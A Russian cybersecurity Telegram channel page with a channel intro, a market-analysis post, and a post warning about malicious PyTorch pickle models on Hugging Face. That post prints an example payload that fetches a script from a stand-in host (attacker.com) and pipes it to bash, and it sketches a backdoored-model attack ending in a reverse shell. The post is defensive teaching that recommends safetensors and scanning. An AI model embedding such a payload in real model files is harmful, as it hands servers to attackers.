🔒 Топ Кибербезопасности Батранкова

Я эксперт, который знает ответы на все вопросы по кибербезопасности — как для суровых технарей, так и для руководителей компаний. В ИБ с 1992 года, раскладываю сложные сетевые технологии и логику NGFW на основе своего опыта работы в Palo Alto Networks, IBM, HP, Positive Technologies и Гарде. Подробнее о авторе канала.

Я организатор конференции по сетевой безопасности. В 2026 году она пройдет уже в третий раз. Приглашаю!
Создал и администрирую несколько телеграм каналов: NGFW, WAF, PAN, советы для ораторов.

Здесь я отбираю топ лучших идей и советов + разбор того, где ломаются «правильные» ИТ-советы.

🔹 О чём этот канал:

⚡️ #ИИ — как внедрять нейросети в корпоративный контур, минимизировать страхи бизнеса и выполнять требования регуляторов (включая Приказ ФСТЭК №117).
🌐 #Сеть — архитектура NGFW, SIEM, WAF, XDR, NTA, NDR защита периметра и построение суверенного ИИ в масштабах страны.
📊 #Аналитика — честный разбор рисков, ландшафт атак, дефицит данных для обучения моделей и реальные кейсы взломов.
📱 #Мошенники — как телефонные мошенники крадут миллионы и как защитить свой мозг (и детей) от дофаминовой зависимости в смартфонах.

🔹 Топовые разборы, с которых стоит начать:

• Финская схема против телефонной зависимости — поведенческий инструмент из 5 шагов, который рвёт связку «импульс → награда» и сокращает экранное время вдвое.
• Суверенный ИИ: где брать данные для обучения? — жесткий разбор того, почему в России нет контуров разметки данных для ИБ и как решить эту проблему на уровне государства.
• U-Score и T-Score в моделях ИИ — как Шойтов А. М. оценивает безопасность и доверие к нейросетям, и почему ассоциации ИИ не занимаются сбором и разметкой данных и рассуждают об этике.
• Вебинар: как безопасно внедрить GenAI в компании — выжимка для тех, кому надоели страхи бизнеса и как пользоваться ИИ и одновременно защитить Enterprise-платформы от утечек по 152-ФЗ.

🔹 Для бизнеса и ИТ-директоров (мои продукты):

Помогаю CISO, ИТ-директорам и фаундерам технологических компаний расти в деньгах и влиянии:
💼 Корпоративный тренинг «Говори так, чтобы покупали» — практическое обучение выступлениям и продажам сложных ИТ-продуктов для технарей. Без маркетинговых обещаний, только работающие механики.
🧠 Экспертные консультации — решаю любые точечные вопросы в сфере информационной безопасности, от аудита архитектуры NGFW до выстраивания стратегии международной экспансии.

🔹 Навигация и контакты:

📺 YouTube-канал «Академия Батранкова»: Ссылка на канал
🚀 Мой зеркальный канал на платформе MAX: Ссылка на MAX
📩 По вопросам консультаций, тренингов и сотрудничества писать напрямую: @safebdv

Жми на теги, читай посты и включайся в обсуждения в комментариях!

☄️ Какие нейросети доступны без VPN и с VPN.
✔️ И все они доступны через API из любой страны без VPN.

Подробнее здесь

Денис Батранков в LinkedIn, Youtube, RuTube и MAX
#ИИ

☄️ Вас подставили ваши ML инженеры: Supply Сhain атака через модели в Hugging Face

Если ваши сотрудники просто скачивают и запускают ИИ-модели из интернета, то для безопасности компании это абсолютно то же самое, как если бы они кликали по случайным .exe файлам из сомнительных пиратских апдейтов.

Когда дата-сайентист загружает модель с Hugging Face в старом формате PyTorch, он, сам того не зная, выполняет на вашем сервере произвольный код, написанный автором этого файла.

Hugging Face — платформа, где разработчики публикуют модели машинного обучения. Что-то вроде GitHub, только для AI. Зашёл, выбрал, скачал.

Как устроен взлом

Классический формат сохранения моделей PyTorch завязан на библиотеку pickle. Но pickle сохраняет не просто чистые данные (числа и веса нейросети). Он работает как автоматический упаковщик: внутри файла создается пошаговая инструкция, как эти данные восстанавливать.

Хакеры научились подмешивать в эти инструкции свои скрытые команды через специальный метод __reduce__. Программа torch.load слепо верит файлу: она начинает его «распаковывать» и автоматически, без каких-либо предупреждений, выполняет зашитый туда вредоносный код.

Внутри файла зашит не текстовый скрипт, а прямая команда. При загрузке модели Python видит инструкцию и принудительно вызывает системный метод:

import os
os.system("curl http://attacker.com/backdoor.sh | bash")

Вы думали, что просто импортируете нейросеть для тестов, а ваш сервер в этот же момент выполнил скрытый шелл-скрипт и отдал управление хакеру.

Это не теория, а живые кейсы

Эксперты из Trail of Bits взяли специальный сканер Fickling и проверили Hugging Face. Они нашли там реальные, живые модели с вредоносными pickle-пейлоадами.

Схема атаки примитивная, но рабочая:

1) Хакер берёт популярную модель.
2) Добавляет скрытый вызов с бэкдором в pickle-файл.
3) Публикует её на Hugging Face под похожим или привлекательным именем.
4) Разработчик ищет официальную llama-3-instruct, натыкается на условную llama-3-instruct-v2-finetuned, скачивает, запускает — и злоумышленник мгновенно получает доступ к вашему серверу (через reverse shell).

Разница между exec() и memcpy()

По уровню безопасности разница между torch.load на старом pickle-файле и загрузкой современного формата safetensors точно такая же, как между функциями exec() (выполнить код) и memcpy() (просто скопировать данные в память).

Safetensors — это формат, который хранит исключительно тензоры. Это аналог обычной таблицы: там лежат только чистые цифры, в которых физически невозможно спрятать или запустить исполняемый код. Хакеру там просто негде скрыться.

Одна строчка в ИБ-политику команды

Чтобы на корню закрыть этот вектор supply chain атак, внедрите жесткое правило:

скачивать только .safetensors.

Никаких .pt, .pth и .pkl.

Отдельный нюанс с расширением .bin. В экосистеме llama.cpp и GGUF файлы .bin — это обычно сырые безопасные веса. Но файл pytorch_model.bin в экосистеме Hugging Face Transformers — это тот же самый опасный pickle, просто замаскированный под другим расширением. Его трогать без проверки нельзя.

Если бинарный файл вашей команде жизненно необходим, он обязан сначала пройти через ModelScan. Эта утилита умеет «читать» инструкции внутри файла без их фактического запуска и ищет вызовы опасных системных модулей вроде os или subprocess. Она не вылечит файл, но гарантированно перехватит пейлоад до того, как вы успеете нажать Enter.

Жду вас в комментариях. Ставьте 🔥, если пост был полезен.

👉 Зарегистрироваться на вебинар и защитить свои данные

Денис Батранков в LinkedIn, Youtube, RuTube и MAX
#ИИ #Кибербезопасность

Почему рынок ИБ растет на 12% (подкаст). Разбор отчета ЦСР и другой аналитики

Высокая ключевая ставка, сокращение бюджетов компаний и острый кадровый дефицит — наша реальность. Данные факторы уже привели к замедлению темпов роста рынка информационной безопасности: если в 2024 году он вырос на 26,3%, то в 2025 году динамика снизилась до 12–16,1%

Парадокс того, что компании жалуются на нехватку денег, но рынок ИБ при этом продолжает расти в объемах, объясняется несколькими факторами адаптации бизнеса:

✔️ Переход на сервисную модель: Именно нехватка бюджетов и кадровый голод заставляют компании отказываться от дорогостоящего самостоятельного построения защиты (покупки оборудования, лицензий и найма штата). Бизнес массово переходит на покупку ИБ по подписке — управляемые сервисы MSSP, MDR, SOC-as-a-Service. Заказчики выбирают такую модель именно ради экономии и оптимизации затрат, но из-за массовости этого перехода сегмент сервисов растет на 20–30% в год, что тянет вверх и общий объем рынка. Я лично считаю, что руководители компаний правильно поступают, используя внешние службы ИБ безопасности.

✔️ИБ стала статьей «обязательной для выживания бизнеса», а не для развития: Из-за беспрецедентного роста целевых кибератак и введения персональной ответственности руководства за утечки данных информационная безопасность перестала быть факультативной статьей расходов, Чтобы обосновать бюджеты в условиях общих сокращений, директора по ИБ используют «ущерб-ориентированный подход»: они доказывают бизнесу, что затраты на киберзащиту несоизмеримо меньше, чем реальные финансовые потери от остановки процессов или потери данных.

✔️Давление регуляторов и угроза штрафов: Жесткие требования государства (ФСТЭК, ФСБ, ЦБ РФ, даже Минцифры) не оставляют бизнесу выбора. Запрет на использование несертифицированных публичных облаков для критичных данных, сжатые сроки перевода объектов КИИ на отечественное ПО и обсуждаемые оборотные штрафы за нарушения заставляют компании изыскивать средства на безопасность под угрозой полной остановки их ИТ-систем.

✔️Формальный рост за счет удорожания лицензий: Важно понимать, что рост рынка «в деньгах» частично обусловлен инфляцией и ростом цен на сами продукты. Эксперты отмечают, что, например, возможная отмена налоговых льгот для ИТ-компаний на реализацию ПО может привести к удорожанию лицензий на 20–25%, что формально также увеличит финансовый объем рынка.

✔️ Взрывное развитие ИИ и смена бизнес-моделей заставляет тратиться на их защиту: Искусственный интеллект кардинально меняет правила игры, выступая одновременно и как новая угроза, и как спасательный круг. С одной стороны, нейросети снижают порог входа для киберпреступников, автоматизируя создание фишинга и ускоряя атаки. С другой — ИИ берет на себя рутину защитников, помогая отчасти компенсировать кадровый голод. Но самое важное: ИИ ломает традиционную экономику рынка. Способность интеллектуальных агентов отсекать до 80% «информационного шума» в логах подрывает привычную вендорам тарификацию по объему обрабатываемых данных (pay-by-volume) и толкает рынок к модели оплаты за конкретный результат отражения атак (pay-by-result). Кроме того, корпоративные ИИ-системы (обучающие данные, RAG-системы, ИИ-агенты) сами становятся новыми объектами защиты, под которые регуляторы (в частности, ФСТЭК) уже выпускают жесткие требования, формируя совершенно новый и быстрорастущий сегмент рынка.

Таким образом, рост рынка в текущих условиях — это не признак избытка бюджетов у бизнеса, а результат вынужденной смены модели потребления (переход к сервисам) и неотложных трат перед лицом критических угроз и регуляторики.

Топ Кибербезопасности Батранкова
#Аналитика #подкаст